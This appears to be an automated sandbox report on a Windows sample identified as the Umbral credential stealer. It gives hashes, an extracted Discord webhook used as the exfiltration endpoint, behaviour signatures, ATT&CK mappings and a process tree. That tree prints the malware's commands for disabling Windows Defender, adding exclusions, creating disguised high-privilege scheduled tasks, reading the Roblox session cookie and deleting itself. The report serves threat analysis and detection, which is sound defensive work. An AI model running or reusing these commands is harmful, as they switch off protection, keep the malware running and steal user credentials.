Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
15-06-2024 14:34
General
-
Target
Client.exe
-
Size
328KB
-
MD5
0518135d19cbb497321df931809a30e8
-
SHA1
34981352c51a3e3b9031902cc3f733d252c12871
-
SHA256
88cf131986bedc03a33d12ea5392ce09f521d40a056b8576a34ee613f36479e5
-
SHA512
adfe6c11cf1af4a5b7af799c2e0d89a660f695149407b54449a3ff4b8186dd3fca3f508670aede4b0592942294ca96d156f2f681a2aaf11481c0711670a17fa2
-
SSDEEP
6144:P5QCJJfSBEmcHe6VlWT8b9uPUfMP0ftbi8J5HW5T:BQNEvHPVle8eaB/HW
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1250802209801768990/UT-yM703TnMgIG2q_IWqIrXHEZ99hyOELHLD6lrsVAgD9l11Of5HuA0IV9npCGc-mIfm
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Umbral payload 2 IoCs
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
-
Modifies AppInit DLL entries 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 62 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 34 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
- Loads dropped DLL
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Loads dropped DLL
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Loads dropped DLL
- Detects videocard installed
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exe" && pause5⤵
-
C:\Windows\system32\PING.EXEping localhost6⤵
- Runs ping.exe
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idxFilesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lockFilesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.valFilesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
